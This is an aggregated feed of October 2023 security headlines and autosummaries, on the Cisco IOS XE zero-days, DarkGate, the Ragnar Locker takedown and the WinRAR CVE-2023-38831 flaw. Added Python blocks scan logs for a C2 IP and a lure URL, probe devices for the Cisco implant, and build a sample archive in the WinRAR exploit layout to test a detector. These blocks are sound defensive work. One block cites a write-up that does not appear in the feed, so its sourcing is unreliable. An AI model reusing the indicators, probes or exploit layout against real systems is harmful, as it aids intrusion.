Autosummary: In this Help Net Security interview, Admiral James A. Winnefeld, advisor to Acalvio Technologies, compares the strategies of traditional and cyber warfare, discusses the difficulty of determining the attack’s nature, addresses ethical dilemmas, and promotes collaboration and cooperation with allies, partners, and, in some cases, even adversaries. New infosec products of the week: October 20, 2023 Here’s a look at the most interesting products from the past week, featuring releases from Arcitecta, AuditBoard, BackBox, Prevalent, and Thales. In this Help Net Security interview, Phil Venables, CISO at Google Cloud, discusses the results of a recent Google report on board collaboration with the C-suite — particularly the CIO, CTO, and CISO to stay current with trends and prioritize security, rather than treating it as an afterthought. "


            Does the paper industry need to cut its water usage?

            industry
            2023-10-22 https://www.bbc.co.uk/news/business-67144689?at_medium=RSS&at_campaign=KARANGA
            Firms in the sector are using new technologies to reduce the amount of water they require. "

            Autosummary: "


            Cisco Zero-Day Exploited to Implant Malicious Lua Backdoor on Thousands of Devices

            exploits
            2023-10-21 https://thehackernews.com/2023/10/cisco-zero-day-exploited-to-implant.html
            Cisco has warned of a new zero-day flaw in IOS XE that has been actively exploited by an unknown threat actor to deploy a malicious Lua-based implant on susceptible devices. Tracked as CVE-2023-20273 (CVSS score: 7.2), the issue relates to a privilege escalation flaw in the web UI feature and is said to have been used alongside CVE-2023-20198 as part of an exploit chain. "The attacker first "

            Autosummary: "


            Europol Dismantles Ragnar Locker Ransomware Infrastructure, Nabs Key Developer

            exploits ransomware
            2023-10-21 https://thehackernews.com/2023/10/europol-dismantles-ragnar-locker.html
            Europol on Friday announced the takedown of the infrastructure associated with Ragnar Locker ransomware, alongside the arrest of a "key target" in France. "In an action carried out between 16 and 20 October, searches were conducted in Czechia, Spain, and Latvia," the agency said. "The main perpetrator, suspected of being a developer of the Ragnar group, has been brought in front of the examining "

            Autosummary: The effort is the latest coordinated exercise involving authorities from Czechia, France, Germany, Italy, Japan, Latvia, the Netherlands, Spain, Sweden, Ukraine, and the U.S. Two suspects associated with the ransomware crew were previously arrested from Ukraine in 2021. "


            American Family Insurance confirms cyberattack is behind IT outages

            ciber
            2023-10-21 https://www.bleepingcomputer.com/news/security/american-family-insurance-confirms-cyberattack-is-behind-it-outages/
            Insurance giant American Family Insurance has confirmed it suffered a cyberattack and shut down portions of its IT systems after customers reported website outages all week. [...] "

Autosummary: If you have any information regarding the American Family Insurance cyberattack, you can contact us confidentially via Signal at 646-961-3731 IT systems shut down after cyberattack Since this past weekend, American Family Insurance has suffered IT outages impacting the company's phone service, building connectivity, and online services. "


            The Week in Ransomware - October 20th 2023 - Fighting Back

            exploits ransomware
            2023-10-21 https://www.bleepingcomputer.com/news/security/the-week-in-ransomware-october-20th-2023-fighting-back/
            This was a bad week for ransomware, with the Trigona ransomware suffering a data breach and law enforcement disrupting the RagnarLocker ransomware operation. [...] "

            Autosummary: Finally, cybersecurity researchers released interesting reports on ransomware, including: Contributors and those who provided new ransomware information and stories this week include: @LawrenceAbrams, @serghei, @fwosar, @Ionut_Ilascu, @billtoulas, @Seifreed, @demonslay335, @malwrhunterteam, @BleepinComputer, @vx_herm1t, @AlvieriD, @AShukuhi, @pcrisk, @rivitna2, @BushidoToken, @ResilienceSays, @SophosXOps, @Unit42_Intel, @jgreigj, @azalsecurity, @AShukuhi, @Cynet360, @FalconFeedsio, and @cyber_int. On Thursday, the RagnarLocker data leak site and negotiation site also began to show a new message, this time a seizure banner by law enforcement from France, the Czech Republic, Germany, Italy, Latvia, the Netherlands, Spain, Sweden, Japan, Canada, and the United States. "


            Over 40,000 Cisco IOS XE devices infected with backdoor using zero-day

            exploits
            2023-10-20 https://www.bleepingcomputer.com/news/security/over-40-000-cisco-ios-xe-devices-infected-with-backdoor-using-zero-day/
            More than 40,000 Cisco devices running the IOS XE operating system have been compromised after hackers exploited a recently disclosed maximum severity vulnerability tracked as CVE-2023-20198. [...] "

            Autosummary: In the U.S., many of the devices are from communications providers such as Comcast, Verizon, Cox Communications, Frontier, AT&T, Spirit, CenturyLink, Charter, Cobridge, Windstream, and Google Fiber. "


            The double-edged sword of heightened regulation for financial services

            financial
            2023-10-20 https://www.helpnetsecurity.com/2023/10/20/financial-services-cybersecurity-risks/

            Financial services organizations are enticing targets for cybercriminals due to their significant wealth holdings, presenting abundant opportunities for monetary gain through extortion, theft, and fraud, according to Trustwave. In addition to the money itself, the financial services sector stores large volumes of sensitive data, including customer information, financial records, and intellectual property. “In a highly competitive B2B and B2C financial services industry, cybersecurity’s role earning and sustaining consumer trust is paramount as a competitive differentiator,” … More

            The post The double-edged sword of heightened regulation for financial services appeared first on Help Net Security.

            "

            Autosummary: The financial services industry holds a vast amount of sensitive customer data, including names, addresses, Social Security numbers, bank account numbers, and credit card numbers, making the sector a high-value target. "


            The real impact of the cybersecurity poverty line on small organizations

            ciber
            2023-10-20 https://www.helpnetsecurity.com/2023/10/20/brent-deterding-afni-cybersecurity-poverty-line/

            The financial constraints many smaller organizations face often cast shadows on their ability to fortify defenses. In this Help Net Security interview, Brent Deterding, CISO at Afni, delves into the realities and myths surrounding the cybersecurity poverty line, exploring the role of budget, knowledge, and leadership. Challenging popular notions and offering actionable insights, Deterding reveals how organizations can rise above financial limitations to safeguard their digital assets effectively. An organization’s modest budget restricts it from … More

            The post The real impact of the cybersecurity poverty line on small organizations appeared first on Help Net Security.

            "

Autosummary: In this Help Net Security interview, Brent Deterding, CISO at Afni, delves into the realities and myths surrounding the cybersecurity poverty line, exploring the role of budget, knowledge, and leadership. That said, I don’t believe people, processes, or technology are limiting factors because significant risk reduction is simple (technology), easy (people/process), and cheap. "


            Researchers uncover DarkGate malware’s Vietnamese connection

            exploits
            2023-10-20 https://www.helpnetsecurity.com/2023/10/20/darkgate-malware/

            WithSecure researchers have tracked attacks using DarkGate malware to an active cluster of cybercriminals operating out of Vietnam. DarkGate is a remote access trojan (RAT) that has been used in attacks since at least 2018 and is currently available to cybercriminals as Malware-as-a-Service (MaaS). It has a diverse user base and a variety of capabilities. It has been observed in information stealing, cryptojacking, and ransomware campaigns. WithSecure researchers began their investigation into DarkGate after detecting … More

            The post Researchers uncover DarkGate malware’s Vietnamese connection appeared first on Help Net Security.

            "

            Autosummary: "


            U.S. DoJ Cracks Down on North Korean IT Scammers Defrauding Global Businesses

            financial
            2023-10-20 https://thehackernews.com/2023/10/us-doj-cracks-down-on-north-korean-it_20.html
The U.S. government has announced the seizure of 17 website domains used by North Korean information technology (IT) workers as part of an illicit scheme to defraud businesses across the world, evade sanctions, and fund the country's ballistic missile program. The Department of Justice (DoJ) said the U.S. confiscated approximately $1.5 million of the revenue that these IT workers collected from "

            Autosummary: "


            Tens of thousands Cisco IOS XE devices were hacked by exploiting CVE-2023-20198

            exploits
            2023-10-20 https://securityaffairs.com/152744/hacking/cisco-ios-xe-attacks-cve-2023-20198.html

            More than 40,000 Cisco IOS XE devices have been compromised in attacks exploiting recently disclosed critical vulnerability CVE-2023-20198. Researchers from LeakIX used the indicators of compromise (IOCs) released by Cisco Talos and found around 30k Cisco IOS XE devices (routers, switches, VPNs) that were infected by exploiting the CVE-2023-20198. Most of the infected devices were […]

            The post Tens of thousands Cisco IOS XE devices were hacked by exploiting CVE-2023-20198 appeared first on Security Affairs.

            "

Autosummary: Researchers from LeakIX used the indicators of compromise (IOCs) released by Cisco Talos and found around 30k Cisco IOS XE devices (routers, switches, VPNs) that were infected by exploiting the CVE-2023-20198. This is a bad situation, as privileged access on the IOS XE likely allows attackers to monitor network traffic, pivot into protected networks, and perform any number of man-in-the-middle attacks.” "


            Kwik Trip finally confirms cyberattack was behind ongoing outage

            ciber
            2023-10-20 https://www.bleepingcomputer.com/news/security/kwik-trip-finally-confirms-cyberattack-was-behind-ongoing-outage/
Two weeks into an ongoing IT outage, Kwik Trip finally confirmed that it's investigating a cyberattack impacting the convenience store chain's internal network since October 9. [...] "

            Autosummary: With a workforce exceeding 35,000 employees, Kwik Trip also manages stores under various banners, including Tobacco Outlet Plus, Tobacco Outlet Plus Grocery, Hearty Platter, Kwik Spirits, and Stop-N-Go. "


            Fake Corsair job offers on LinkedIn push DarkGate malware

            exploits
            2023-10-20 https://www.bleepingcomputer.com/news/security/fake-corsair-job-offers-on-linkedin-push-darkgate-malware/
            A threat actor is using fake LinkedIn posts and direct messages about a Facebook Ads specialist position at hardware maker Corsair to lure people into downloading info-stealing malware like DarkGate and RedLine. [...] "

Autosummary: Targets are tricked into downloading malicious files from a URL (“g2[.]by/corsair-JD”) that redirects to Google Drive or Dropbox to drop a ZIP file (“Salary and new products.8.4.zip”) with a PDF or DOCX document and a TXT file with the following names: “Job Description of Corsair.docx”, “Salary and new products.txt”, “PDF Salary and Products.pdf”. WithSecure researchers analyzed the metadata for the above files and found leads to RedLine stealer distribution. "
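Both the Malwarebytes MDR write-up above (C2 address 5[.]188[.]87[.]58) and this Corsair lure (g2[.]by/corsair-JD) publish their indicators defanged, which is how they should be shared but not how they appear in logs. The following Python is an added example, not code from Malwarebytes, WithSecure or BleepingComputer: it refangs the two indicators exactly as printed on this page and sweeps a handful of proxy log lines constructed for the example, with boundary checks so that an unrelated address such as 15.188.87.58 does not match the C2 IP.

```python
import re
from typing import Iterable, List, Pattern, Tuple

# Indicators copied from the two reports above, still in their defanged form.
DEFANGED_IOCS = [
    "5[.]188[.]87[.]58",    # DarkGate C2 IP (Malwarebytes MDR report)
    "g2[.]by/corsair-JD",   # lure URL from the fake Corsair job offer
]

# Constructed proxy log lines for this example (not real traffic).
SAMPLE_LOG_LINES = [
    "2023-09-13T09:58:12Z ALLOW src=10.0.5.23 dst=5.188.87.58:443 url=https://5.188.87.58/",
    "2023-09-13T10:01:44Z ALLOW src=10.0.5.23 dst=142.250.74.46:443 url=https://drive.google.com/",
    "2023-10-19T14:22:03Z ALLOW src=10.0.7.9 dst=104.21.5.7:443 url=https://g2.by/corsair-JD",
    "2023-10-19T14:22:05Z ALLOW src=10.0.7.9 dst=15.188.87.58:443 url=https://example.org/",
]


def refang(indicator: str) -> str:
    """Undo the usual defanging conventions: [.] or (.) -> '.', [:] -> ':', hxxp -> http."""
    s = indicator.strip()
    s = s.replace("[.]", ".").replace("(.)", ".").replace("[:]", ":")
    s = re.sub(r"^hxxp(s?)://", r"http\1://", s, flags=re.IGNORECASE)
    return s


def compile_ioc_patterns(defanged: Iterable[str]) -> List[Tuple[str, Pattern[str]]]:
    """Build boundary-aware regexes: the IoC must not be preceded or followed by a
    word character, dot or dash, so 5.188.87.58 never matches inside 15.188.87.58
    and a domain never matches as the suffix of a longer host name."""
    patterns = []
    for ioc in defanged:
        literal = re.escape(refang(ioc))
        patterns.append((ioc, re.compile(r"(?<![\w.-])" + literal + r"(?![\w-])", re.IGNORECASE)))
    return patterns


def scan_log_lines(lines: Iterable[str], patterns: List[Tuple[str, Pattern[str]]]) -> List[Tuple[int, str, str]]:
    """Return (line number, defanged IoC as published, log line) for every hit."""
    hits = []
    for number, line in enumerate(lines, start=1):
        for ioc, pattern in patterns:
            if pattern.search(line):
                hits.append((number, ioc, line.rstrip()))
    return hits


if __name__ == "__main__":
    for number, ioc, line in scan_log_lines(SAMPLE_LOG_LINES, compile_ioc_patterns(DEFANGED_IOCS)):
        print(f"line {number}: {ioc} -> {line}")
```

Run against the constructed lines, only line 1 (the C2 address) and line 3 (the lure URL) are reported; line 4, which carries 15.188.87.58, is not. Feed real proxy or DNS logs to scan_log_lines in place of SAMPLE_LOG_LINES.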


            NetSPI boosts phishing resilience with enhanced social engineering penetration testing

            financial
            2023-10-20 https://www.helpnetsecurity.com/2023/10/20/netspi-social-engineering-penetration-testing/

            NetSPI unveiled enhancements to its social engineering penetration testing solutions to help organizations build resilience to modern-day phishing attacks. The updates bring a customized, contextual approach to social engineering testing and go beyond basic phishing campaigns to simulate advanced techniques such as device code and OAuth application phishing and capturing multi-factor authentication tokens. NetSPI has identified opportunities to update its processes and tooling to create efficiencies, cost savings, and scalability. The phishing tests follow NetSPI’s … More

            The post NetSPI boosts phishing resilience with enhanced social engineering penetration testing appeared first on Help Net Security.

            "

            Autosummary: "


            ABS Consulting and Dragos boost OT cybersecurity partnership for federal and commercial sectors

            ciber
            2023-10-20 https://www.helpnetsecurity.com/2023/10/20/abs-consulting-dragos/

            ABS Consulting and Dragos have expanded their strategic partnership to provide operational technology (OT) cybersecurity solutions, services and training to federal and commercial organizations. This strategic partnership will build on the companies’ existing work together, further integrating Dragos’ OT cybersecurity technology with ABS Consulting’s OT risk management expertise to address the market-wide demand for a comprehensive, well-resourced approach to cyber defense. “As cyber attacks on critical industries become more frequent and severe, securing the facilities … More

            The post ABS Consulting and Dragos boost OT cybersecurity partnership for federal and commercial sectors appeared first on Help Net Security.

            "

            Autosummary: "


            Vietnamese Hackers Target U.K., U.S., and India with DarkGate Malware

            exploits
            2023-10-20 https://thehackernews.com/2023/10/vietnamese-hackers-target-uk-us-and.html
            Attacks leveraging the DarkGate commodity malware targeting entities in the U.K., the U.S., and India have been linked to Vietnamese actors associated with the use of the infamous Ducktail stealer. "The overlap of tools and campaigns is very likely due to the effects of a cybercrime marketplace," WithSecure said in a report published today. "Threat actors are able to acquire and use multiple "

            Autosummary: "


            CISA adds Cisco IOS XE flaw to its Known Exploited Vulnerabilities catalog

            exploits
            2023-10-20 https://securityaffairs.com/152763/hacking/cisa-adds-cisco-ios-xe-flaw-known-exploited-vulnerabilities-catalog.html

            US CISA added the vulnerability CVE-2021-1435 in Cisco IOS XE to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added the vulnerability CVE-2021-1435 in Cisco IOS XE. The vulnerability is a command injection vulnerability in the web user interface that could allow a remote, authenticated attacker to inject commands that can be executed as the root […]

            The post CISA adds Cisco IOS XE flaw to its Known Exploited Vulnerabilities catalog appeared first on Security Affairs.

            "

Autosummary: CISA adds Cisco IOS XE flaw to its Known Exploited Vulnerabilities catalog Pierluigi Paganini October 20, 2023 US CISA added the vulnerability CVE-2021-1435 in Cisco IOS XE to its Known Exploited Vulnerabilities catalog. "


            Ragnar Locker ransomware developer arrested in France

            exploits ransomware
            2023-10-20 https://www.bleepingcomputer.com/news/security/ragnar-locker-ransomware-developer-arrested-in-france/
Law enforcement agencies arrested a malware developer linked with the Ragnar Locker ransomware gang and seized the group's dark web sites in a joint international operation. [...] "

            Autosummary: This joint operation between authorities from France, the Czech Republic, Germany, Italy, Latvia, the Netherlands, Spain, Sweden, Japan, Canada, and the United States marks the third action against the same ransomware gang. "


            Cisco discloses new IOS XE zero-day exploited to deploy malware implant

            exploits
            2023-10-20 https://www.bleepingcomputer.com/news/security/cisco-discloses-new-ios-xe-zero-day-exploited-to-deploy-malware-implant/
            Cisco disclosed a new high-severity zero-day (CVE-2023-20273) today, actively exploited to deploy malicious implants on IOS XE devices compromised using the CVE-2023-20198 zero-day unveiled earlier this week. [...] "

            Autosummary: One way to detect the malicious implant on compromised Cisco IOS XE devices requires running the following command on the device, where the placeholder "DEVICEIP" represents the IP address under investigation: curl -k -X POST "https[:]//DEVICEIP/webui/logoutconfirm.html?logon_hash=1" Last month, Cisco warned customers to patch another zero-day bug (CVE-2023-20109) in its IOS and IOS XE software, also targeted by attackers in the wild "
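The curl command above is Cisco Talos's published implant check; Talos stated that an infected device answers it with a hexadecimal string (their example was 0123456789abcdef01), whereas a clean web UI returns its normal HTML or an error. The following Python is an added example, not Cisco's or BleepingComputer's code: it issues the same POST to a list of devices while ignoring the device's usually self-signed certificate (what curl -k does) and turns the response into a verdict. The 16-character minimum for the hex match is this example's own threshold, not something Cisco specified.

```python
import re
import ssl
import sys
import urllib.error
import urllib.request

# Same path the curl command above probes.
IMPLANT_PROBE_PATH = "/webui/logoutconfirm.html?logon_hash=1"

# Talos: an infected device answers with a hex string (e.g. 0123456789abcdef01).
# Requiring at least 16 hex digits is an assumption of this example, chosen so that
# a short incidental token is not mistaken for the implant's reply.
HEX_RESPONSE = re.compile(r"[0-9a-fA-F]{16,}")


def classify_implant_response(body: str) -> str:
    """Map the probe's response body to a verdict: 'implant' or 'no-implant-response'."""
    text = body.strip()
    if HEX_RESPONSE.fullmatch(text):
        return "implant"
    return "no-implant-response"


def check_device(ip: str, timeout: float = 5.0) -> str:
    """Send the POST probe to one device over HTTPS without certificate verification
    (the equivalent of curl -k) and classify whatever comes back."""
    ctx = ssl.create_default_context()
    ctx.check_hostname = False
    ctx.verify_mode = ssl.CERT_NONE
    req = urllib.request.Request(f"https://{ip}{IMPLANT_PROBE_PATH}", data=b"", method="POST")
    try:
        with urllib.request.urlopen(req, timeout=timeout, context=ctx) as resp:
            return classify_implant_response(resp.read().decode("utf-8", "replace"))
    except urllib.error.HTTPError as err:            # a 4xx/5xx still carries a body worth checking
        return classify_implant_response(err.read().decode("utf-8", "replace"))
    except (urllib.error.URLError, OSError) as err:  # refused, timed out, or no web UI exposed
        return f"error: {err}"


if __name__ == "__main__":
    # usage: python check_ios_xe_implant.py 192.0.2.10 192.0.2.11 ...
    for device in sys.argv[1:]:
        print(f"{device}: {check_device(device)}")
```

Treat "implant" as a confirmed compromise and start incident response; treat "no-implant-response" as one negative indicator only. Implant variants observed after the first disclosure were reported to answer only requests carrying a specific HTTP header, so a silent device is not proof of a clean one; compare against Cisco's current guidance and the Talos IOCs before closing the case.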


            Alleged developer of the Ragnar Locker ransomware was arrested

            exploits ransomware
            2023-10-20 https://securityaffairs.com/152776/cyber-crime/ragnar-locker-ransomware-op-dismantled.html

            A joint international law enforcement investigation led to the arrest of a malware developer who was involved in the Ragnar Locker ransomware operation. Yesterday we became aware of a joint law enforcement operation that led to the seizure of the Ragnar Locker ransomware’s infrastructure. The police on Thursday seized the Tor negotiation and data leak sites, group’s […]

            The post Alleged developer of the Ragnar Locker ransomware was arrested appeared first on Security Affairs.

            "

Autosummary: Alleged developer of the Ragnar Locker ransomware was arrested Pierluigi Paganini October 20, 2023 A joint international law enforcement investigation led to the arrest of a malware developer who was involved in the Ragnar Locker ransomware operation. "


            Ragnar Locker ransomware group taken down

            exploits ransomware
            2023-10-20 https://www.malwarebytes.com/blog/news/2023/10/ragnar-locker-taken-down

            Categories: News

            Categories: Ransomware

            Tags: ragnar locker

            Tags: europol

            Tags: eurojust

            One of the oldest active ransomware gangs has been taken down by an international cooperation of law enforcement agencies

            (Read more...)

            The post Ragnar Locker ransomware group taken down appeared first on Malwarebytes Labs.

            "

Autosummary: Once you've isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again. Posted: October 20, 2023. One of the oldest active ransomware gangs has been taken down by an international cooperation of law enforcement agencies. Even though it had a long run for a ransomware group, it seems the bell might be tolling for Ragnar Locker. Ragnar Locker's known attacks by industry sector, October 2022 - September 2023 In 2022, the FBI published a flash alert to warn that the Ragnar Locker ransomware gang had breached the networks of at least 52 organizations across 10 critical infrastructure sectors. "


            Spearphishing targets in Latin America – Week in security with Tony Anscombe

            financial
            2023-10-20 https://www.welivesecurity.com/en/videos/spearphishing-targets-latin-america-week-security-tony-anscombe/
ESET's analysis of cybercrime campaigns in Latin America reveals a notable shift from opportunistic crimeware to more complex threats, including those targeting enterprises and governments "

            Autosummary: "


            Super Mario Bros Wonder game a "notebook of chaos", critics say

            industry
            2023-10-20 https://www.bbc.co.uk/news/entertainment-arts-67167404?at_medium=RSS&at_campaign=KARANGA
            The latest Nintendo adventure follows the gang through the new Flower Kingdom. "

            Autosummary: "


            Business resilience becomes primary force behind cybersecurity investments

            ciber
            2023-10-19 https://www.helpnetsecurity.com/2023/10/19/business-resilience-investments/

            Over 80% of northern European organizations emphasize that the need to ensure business resilience is the top driver for their cybersecurity investments, according to Nixu. The report reveals both encouraging progress and increasing concerns. Alarmingly, 50% of organizations reach only a poor or deficient level in cybersecurity. “The prominence of business resilience as a driver for cybersecurity investments highlights the increasing awareness of the need to protect operations and ensure continuity. Overall, the Nixu report … More

            The post Business resilience becomes primary force behind cybersecurity investments appeared first on Help Net Security.

            "

            Autosummary: Through better security monitoring, organizations are able to detect early indications of attacks, and with more sophisticated response capabilities, organizations can limit the impact of any incident,” says Jan Mickos, Nixu’s SVP and Service Area Lead of Managed Services. To solve the serious issues of managing competences and ensuring resilience, the report recommends consistent cybersecurity management, investing in risk management, and complementing internal operations with an external service delivery capabilities partner. "


            Reinforcing cybersecurity: The network’s role to prevent, detect, and respond to attacks

            ciber
            2023-10-19 https://www.helpnetsecurity.com/2023/10/19/dns-issue/

            It’s always DNS. That’s what the famous internet meme popular among sysadmins says anyway. It’s funny because while clearly, every network issue doesn’t resolve to some funky DNS issue, too many network admins have banged their heads against their keyboard for hours only to find out that the culprit was indeed some DNS issue. Yes, it might not always be DNS, but when it comes to cyberattacks, it is too often the network. Example: In … More

            The post Reinforcing cybersecurity: The network’s role to prevent, detect, and respond to attacks appeared first on Help Net Security.

            "

Autosummary: But to give you an idea of how to use the framework, I’ll give you a few questions to ask your network team to determine your level of organization maturity in each area: Prevent: Does our network monitoring include only IP, port, and protocol tracking? I sum up the organization network security triad as such: Prevent: Reduce the likelihood of a full-blown attack before it happens. Detect: Mitigate attacks faster when they do occur. Prevent, detect, respond: I believe the key to better network security can be summed up with the triad of Prevent, Detect, and Respond. "


            Microsoft Warns of North Korean Attacks Exploiting TeamCity Flaw

            exploits government
            2023-10-19 https://thehackernews.com/2023/10/microsoft-warns-of-north-korean-attacks.html
            North Korean threat actors are actively exploiting a critical security flaw in JetBrains TeamCity to opportunistically breach vulnerable servers, according to Microsoft. The attacks, which entail the exploitation of CVE-2023-42793 (CVSS score: 9.8), have been attributed to Diamond Sleet (aka Labyrinth Chollima) and Onyx Sleet (aka Andariel or Silent Chollima). It"s worth noting that both the "

            Autosummary: "We certainly believe that North Korean hacking of cryptocurrency around infrastructure, around the world – including in Singapore, Vietnam, and Hong Kong – is a major source of revenue for the regime that"s used to finance the advancing of the missile program and the far greater number of launches we have seen in the last year," U.S. Deputy National Security Advisor, Anne Neuberger, said. "


            Google TAG Detects State-Backed Threat Actors Exploiting WinRAR Flaw

            exploits government
            2023-10-19 https://thehackernews.com/2023/10/google-tag-detects-state-backed-threat.html
A number of state-backed threat actors from Russia and China have been observed exploiting a recent security flaw in the WinRAR archiver tool for Windows as part of their operations. The vulnerability in question is CVE-2023-38831 (CVSS score: 7.8), which allows attackers to execute arbitrary code when a user attempts to view a benign file within a ZIP archive. The shortcoming has been actively "

            Autosummary: "


            Multiple APT groups exploited WinRAR flaw CVE-2023-38831

            exploits
            2023-10-19 https://securityaffairs.com/152669/apt/apt-groups-winrar-flaw.html

Google TAG reported that both Russia and China-linked threat actors are weaponizing a high-severity vulnerability in WinRAR. Google’s Threat Analysis Group (TAG) reported that in recent weeks multiple nation-state actors were spotted exploiting the vulnerability CVE-2023-38831 in WinRAR. The researchers reported that several cybercrime groups began exploiting the flaw in early 2023, when the […]

            The post Multiple APT groups exploited WinRAR flaw CVE-2023-38831 appeared first on Security Affairs.

            "

Autosummary: Multiple APT groups exploited WinRAR flaw CVE-2023-38831 Pierluigi Paganini October 19, 2023 Google TAG reported that both Russia and China-linked threat actors are weaponizing a high-severity vulnerability in WinRAR. "
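Both WinRAR items above (the Google TAG report and this one) describe CVE-2023-38831 only as code execution triggered when a user views a benign file inside a ZIP. The public analysis that first documented the bug (Group-IB) described the archive layout that triggers it: a decoy file sitting next to a directory whose name is the decoy's name plus a trailing space, with a similarly named script inside that directory. The following Python is an added example, not code from Google TAG, Group-IB, RARLAB or any vendor: a static scanner that flags that layout from ZIP entry names alone, without extracting anything, run here against two archives built in memory for the example (the "script" is an inert placeholder, not malware).

```python
import io
import re
import zipfile
from typing import List, Tuple


def find_cve_2023_38831_layout(zip_bytes: bytes) -> List[Tuple[str, str]]:
    """Return (decoy file, entry inside its trailing-space twin directory) pairs.
    Only the central directory's entry names are read; no member is extracted."""
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        names = zf.namelist()
    files = [n for n in names if not n.endswith("/")]
    findings = []
    for decoy in files:
        # an entry that lives in a directory named "<decoy><one or more spaces>/"
        inside_twin_dir = re.compile(re.escape(decoy) + r" +/")
        for other in names:
            if other != decoy and inside_twin_dir.match(other):
                findings.append((decoy, other))
    return findings


def build_sample_malicious_archive() -> bytes:
    """Constructed for this example: the layout reported for CVE-2023-38831 samples."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("invoice.pdf", b"%PDF-1.4\n% decoy document\n")
        zf.writestr("invoice.pdf /invoice.pdf .cmd", b"@echo off\r\necho placeholder\r\n")
    return buf.getvalue()


def build_sample_clean_archive() -> bytes:
    """Constructed benign archive: a document plus a normally named subdirectory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("report.pdf", b"%PDF-1.4\n")
        zf.writestr("report_assets/logo.png", b"\x89PNG\r\n\x1a\n")
    return buf.getvalue()


if __name__ == "__main__":
    import sys
    for path in sys.argv[1:]:
        with open(path, "rb") as fh:
            for decoy, script in find_cve_2023_38831_layout(fh.read()):
                print(f"{path}: {decoy!r} shadowed by {script!r}")
```

The heuristic is deliberately narrow: a directory whose name ends in whitespace and mirrors a sibling file has no legitimate use, so every hit deserves a look, but an absence of hits says nothing about other lures. It inspects ZIP containers only (the in-the-wild samples were ZIPs handled by WinRAR); scanning RAR archives needs a RAR parser, and the real fix is updating WinRAR to a version that corrects the flaw.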


            Casio discloses data breach impacting customers in 149 countries

            financial
            2023-10-19 https://www.bleepingcomputer.com/news/security/casio-discloses-data-breach-impacting-customers-in-149-countries/
Japanese electronics manufacturer Casio disclosed a data breach impacting customers from 149 countries after hackers gained access to the servers of its ClassPad education platform. [...] "

            Autosummary: If anyone wants the AWS keys (with some pretty juicy permissions, S3 bucket access, etc.) and database credentials, etc., DM me," the threat actor said. "


            2024 cybersecurity predictions: GenAI edition

            ciber
            2023-10-19 https://www.helpnetsecurity.com/2023/10/19/genai-2024-cybersecurity-predictions/

            Unless you have lived under a rock for the past year, you know that generative artificial intelligence applications, such as ChatGPT, have penetrated many aspects of our online lives. From generating marketing content, creating images for advertisements and blogs, or even writing malicious code, we are all interacting with the results of generative AI in some ways daily. So, when I was thinking about writing about 2024 predictions, I thought, why not give Gen AI … More

            The post 2024 cybersecurity predictions: GenAI edition appeared first on Help Net Security.

            "

            Autosummary: While eliminating the potential of an attack is unrealistic, ensuring proper network segmentation, adopting new automation capabilities regarding security analytics, and (yes, again) proper cybersecurity training for everyone, including contractors, can go a long way. The fact of the matter, though, is that no one knows what the new year has to offer, aside from the fact that attackers will continue to attack, defenders will continue to defend, and vendors and service providers will be here to help. AI-powered attacks may include more convincing phishing attempts, automated malware creation, evasion of security measures, and personalized social engineering attacks, making it harder for traditional defense mechanisms to detect and prevent them. While that attack was a wake-up call for many organizations to be more vigilant regarding their network segmentation, third-party access, and more, only some have taken the appropriate steps to ensure they are protected from a similar attack.


            Google ads for KeePass, Notepad++ lead to malware

            exploits
            2023-10-19 https://www.helpnetsecurity.com/2023/10/19/download-keepass-notepad/

            Users who turn to Google to find and download the KeePass password manager or the Notepad++ text editor may have inadvertently ended up with malware, says Jérôme Segura, Director of Threat Intelligence at Malwarebytes. Malvertising via search engine ads is a constant, evolving threat that never quite goes away and, according to Malwarebytes, it is ramping up again. “Threat actors are successfully applying evasion techniques that bypass ad verification checks and allow them to target certain types … More

            The post Google ads for KeePass, Notepad++ lead to malware appeared first on Help Net Security.

            "

            Autosummary: Malvertising via search engine ads is a constant, evolving threat that seemingly never goes away and, according to Malwarebytes, it’s ramping up again. "


            Iran-Linked OilRig Targets Middle East Governments in 8-Month Cyber Campaign

            government
            2023-10-19 https://thehackernews.com/2023/10/iran-linked-oilrig-targets-middle-east.html
            The Iran-linked OilRig threat actor targeted an unnamed Middle East government between February and September 2023 as part of an eight-month-long campaign. The attack led to the theft of files and passwords and, in one instance, resulted in the deployment of a PowerShell backdoor called PowerExchange, the Symantec Threat Hunter Team, part of Broadcom, said in a report shared with The Hacker News "



            North Korea-linked APT groups actively exploit JetBrains TeamCity flaw

            exploits government
            2023-10-19 https://securityaffairs.com/152697/apt/north-korea-linked-apt-groups-actively-exploit-jetbrains-teamcity-flaw.html

            North Korea-linked threat actors are actively exploiting a critical vulnerability CVE-2023-42793 in JetBrains TeamCity. Microsoft warns that North Korea-linked threat actors are actively exploiting a critical security vulnerability, tracked as CVE-2023-42793 (CVSS score: 9.8), in JetBrains TeamCity. CVE-2023-42793 is an authentication bypass issue affecting the on-premises version of TeamCity. An attacker can exploit the flaw to steal […]

            The post North Korea-linked APT groups actively exploit JetBrains TeamCity flaw appeared first on Security Affairs.

            "

            Autosummary: Pierluigi Paganini, October 19, 2023. Microsoft warns that North Korea-linked threat actors are actively exploiting a critical security vulnerability, tracked as CVE-2023-42793 (CVSS score: 9.8), in JetBrains TeamCity.


            Ragnar Locker ransomware’s dark web extortion sites seized by police

            exploits ransomware
            2023-10-19 https://www.bleepingcomputer.com/news/security/ragnar-locker-ransomwares-dark-web-extortion-sites-seized-by-police/
            The Ragnar Locker ransomware operation's Tor negotiation and data leak sites were seized Thursday morning as part of an international law enforcement operation. [...]

            Autosummary: BleepingComputer has confirmed that visiting either website now displays a seizure message stating that a large assortment of international law enforcement from the US, Europe, Germany, France, Italy, Japan, Spain, Netherlands, Czech Republic, and Latvia were involved in the operation. "


            AuditBoard unveils AI and analytics capabilities to help teams automate critical workflows

            industry
            2023-10-19 https://www.helpnetsecurity.com/2023/10/19/auditboard-analytics/

